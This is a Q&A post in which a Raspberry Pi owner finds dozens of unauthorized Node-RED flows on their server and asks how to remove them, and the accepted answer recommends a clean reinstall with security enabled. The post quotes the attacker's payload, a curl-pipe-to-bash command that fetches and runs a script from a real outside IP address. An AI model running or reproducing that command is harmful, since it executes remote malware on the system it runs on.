# Remove Multiple Node-Red Flows - Raspberry Pi LAMP Hack

Tags: solr, raspberry-pi, node-red

I have a raspberry pi LAMP server which I use as a hobby.  I also have Node-Red installed which I use for ESp8266 Sensors.

I looked at Node-Red today and there are possibly 40 - 50 flows added (which I did not create).  They are all the same timestamp, feeding to message payload.  The payload is

> curl -s http://192.99.142.248:8220/mr.sh | bash -sh

The same as is reported here:

[SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process](https://stackoverflow.com/questions/51982703/solrexception-error-loading-class-solr-runexecutablelistener-var-tmp-sust)

Does anyone know how I can delete all flows? Can I delete and clean install Node-Red?  I don't have anything on the RPi which I need to keep.  Thanks.

Answer (score 2, accepted):

Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460

This comes as a result of exposing Node-RED to the internet without applying any security.

Your safest course of action is to wipe the SD card and start with a clean system.

Make sure you enable security this time - details in the post linked above.